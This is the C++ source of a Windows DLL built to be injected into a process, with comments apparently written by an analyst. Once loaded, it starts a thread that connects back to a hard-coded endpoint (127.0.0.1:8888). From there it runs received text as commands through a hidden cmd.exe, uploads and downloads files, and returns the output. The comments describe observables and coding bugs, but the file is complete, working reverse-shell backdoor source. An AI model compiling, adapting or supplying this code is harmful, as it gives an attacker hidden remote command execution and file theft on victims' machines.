#include "stdio.h"
#include "stdlib.h"
#include <iostream>
#include "windows.h"
#pragma comment(lib,"ws2_32.lib")
using namespace std;
// Thread entry started from DllMain. Connects to a hard-coded TCP endpoint,
// sends a banner, then loops reading short text commands from that socket:
// "-e" closes the connection, "-u" writes a file, "-d" reads a file back,
// anything else is handed to a hidden cmd.exe whose output is relayed back.
// Every exit path returns 0; lParam is unused.
// Analyst note: observables in this function are the modal MessageBox text
// "aaa", the destination 127.0.0.1:8888, the banner "shell success!\r\n"
// sent immediately after connect, the "-e"/"-u"/"-d" command prefixes, the
// debug-style printf/puts output, and a hidden child process built from
// "<SystemDirectory>\cmd.exe /c".
DWORD WINAPI ThreadProc(LPVOID lParam)
{
// Modal message box: this thread does not continue until it is dismissed.
MessageBox(NULL,"aaa",NULL,MB_OK);
// fflush on an input stream is undefined behaviour per the C standard; it
// has no effect on the socket logic below.
fflush(stdin);
SOCKET shellsocket;
WSADATA wsadata;
WORD sockversion = MAKEWORD(2,2);
// Fixed-size buffers. recvcmd (256), path (100), filebuff (4096) and
// cmdline (256) below are sized independently of one another; see the
// strcpy/strncat notes where data crosses between them.
char test[256] = "shell success!\r\n";
char cmdline[256] = {0};
char result[4096] = {0};
// Winsock init failure ends the thread silently (no WSACleanup anywhere).
if(WSAStartup(sockversion,&wsadata)!=0)
{
return 0;
}
// Hard-coded callback endpoint: 127.0.0.1, TCP port 8888. No DNS, no
// configuration, no retry.
sockaddr_in sin;
sin.sin_family = AF_INET;
sin.sin_port = htons(8888);
sin.sin_addr.S_un.S_addr = inet_addr("127.0.0.1");
// Return values of socket() and connect() are not checked; a failed
// connect still falls through to send()/recv(), and presumably the
// SOCKET_ERROR check inside the loop is what then ends the thread.
shellsocket = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
connect(shellsocket,(LPSOCKADDR)&sin,sizeof(sin));
send(shellsocket,test,strlen(test),0);
// Command loop. There is no break, so the trailing "return 0" after the
// loop is unreachable; the thread leaves only via the returns inside.
while(1)
{
memset(cmdline,0,256);
// One recv() per command, at most 256 bytes. recvcmd is zero-filled, so any
// message shorter than 256 bytes is NUL-terminated; a full 256-byte message
// leaves no terminator for the strcmp/strlen/std::string uses below.
char recvcmd[256] = {0};
int len = recv(shellsocket,recvcmd,256,NULL);
// Copied before len is checked. On SOCKET_ERROR recvcmd is presumably still
// the zeroed buffer, so tmp is empty and unused.
string tmp = recvcmd;
if(len == SOCKET_ERROR)
{
printf("recv error");
return 0;
}
// "-e": the only path that closes the socket before returning.
if(strcmp(recvcmd,"-e") == 0)
{
printf("success exit!");
closesocket(shellsocket);
return 0;
}
// "-u ... <path>": a second recv() supplies up to 4096 bytes of content;
// the destination path is the text after the last space of the command.
// If there is no space, rfind returns npos and npos+1 wraps to 0, so the
// whole command string becomes the path. path[100] receives a strcpy of a
// substring that can be up to 255 bytes long, and fopen's result is used
// without a NULL check. filelen is assigned but never read; the fwrite
// length is strlen(filebuff), so content is written only up to the first
// NUL byte regardless of how much was received.
else if(strncmp(recvcmd,"-u",2) == 0)
{
char path[100];
char filebuff[4096] = {0};
int filelen = recv(shellsocket,filebuff,4096,NULL);
strcpy(path,tmp.substr(tmp.rfind(" ")+1,tmp.length()-1).c_str());
FILE *f = fopen(path,"w+");
//puts(filebuff);
fflush(stdin);
fwrite(filebuff,1,strlen(filebuff),f);
fclose(f);
}
// "-d <path> ...": reads up to 4096 bytes from the named file and sends
// them back. The path is taken from tmp starting after the first space with
// a length of rfind(" ")-2; this arithmetic appears to yield an empty path
// when the command has a single space and to include the trailing space
// otherwise — TODO confirm against the intended command format. fopen's
// result is unchecked, filelen is declared but unused, and the send length
// is strlen(filebuff), so transfer stops at the first NUL byte.
else if(strncmp(recvcmd,"-d",2) == 0)
{
char path[100];
char filebuff[4096] = {0};
DWORD filelen;
strcpy(path,tmp.substr(tmp.find(" ")+1,tmp.rfind(" ")-2).c_str());
FILE *f = fopen(path,"r+");
fread(filebuff,1,4096,f);
send(shellsocket,filebuff,strlen(filebuff),0);
fclose(f);
}
// Any other input is executed: "<SystemDirectory>\cmd.exe /c" immediately
// followed by the received text, with a hidden window and stdout/stderr
// redirected into an inheritable anonymous pipe that is drained below.
else
{
// Inheritable pipe so the child can write to hwrite.
SECURITY_ATTRIBUTES sa;
HANDLE hread,hwrite;
sa.nLength = sizeof(SECURITY_ATTRIBUTES);
sa.bInheritHandle = TRUE;
sa.lpSecurityDescriptor = NULL;
if(!CreatePipe(&hread,&hwrite,(LPSECURITY_ATTRIBUTES)&sa,0))
{
printf("pipe error");
return 0;
}
// si is first filled by GetStartupInfo, then stdout/stderr and the window
// state are overridden; hStdInput is left as GetStartupInfo provided it.
STARTUPINFO si;
PROCESS_INFORMATION pi;
si.cb = sizeof(STARTUPINFO);
GetStartupInfo(&si);
si.hStdError = hwrite;
si.hStdOutput = hwrite;
si.wShowWindow = SW_HIDE;
si.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
// cmdline[256] receives the system directory, the literal "\cmd.exe /c"
// and then up to strlen(recvcmd) bytes (max 255) with no separating space
// and no bounds check against the 256-byte buffer.
GetSystemDirectory(cmdline,sizeof(cmdline));
strcat(cmdline,"\\cmd.exe /c");
strncat(cmdline,recvcmd,strlen(recvcmd));
// bInheritHandles is TRUE so hwrite is inherited; pi.hProcess and
// pi.hThread are never closed on this path.
if(!CreateProcess(NULL,cmdline,NULL,NULL,TRUE,NULL,NULL,NULL,&si,&pi))
{
printf("exec error");
return 0;
}
// Close the local write end so that, once the child exits, ReadFile on
// hread presumably fails (broken pipe) and the relay loop ends. hread
// itself is never closed.
CloseHandle(hwrite);
DWORD readlen;
while(ReadFile(hread,result,4096,&readlen,NULL))
{
// The send uses readlen, but puts() prints up to the first NUL, and the
// memset clears only the first 1024 of result's 4096 bytes, so stale tail
// data from an earlier chunk can remain in the buffer.
send(shellsocket,result,readlen,0);
printf("result:\n");
puts(result);
memset(result,0,1024);
}
}
}
return 0;
}
// DLL entry point. On DLL_PROCESS_ATTACH it emits the debug string
// "inject success!!!" via OutputDebugString, starts ThreadProc on a new
// thread and immediately closes the thread handle (the thread keeps running
// detached; nothing waits on it). All other reasons do nothing. Always
// returns TRUE. hinstDLL and lpvResvered (sic) are unused.
// Analyst note: the network and process-spawning work lives entirely in
// ThreadProc, so the only activity observable at load time is the debug
// string and the CreateThread call.
BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD dwReason,LPVOID lpvResvered)
{
HANDLE hthread = NULL;
switch(dwReason)
{
case DLL_PROCESS_ATTACH:
OutputDebugString("inject success!!!");
// CreateThread's result is not checked; CloseHandle(NULL) on failure is
// harmless here.
hthread = CreateThread(NULL,0,ThreadProc,NULL,0,NULL);
CloseHandle(hthread);
break;
}
return TRUE;
}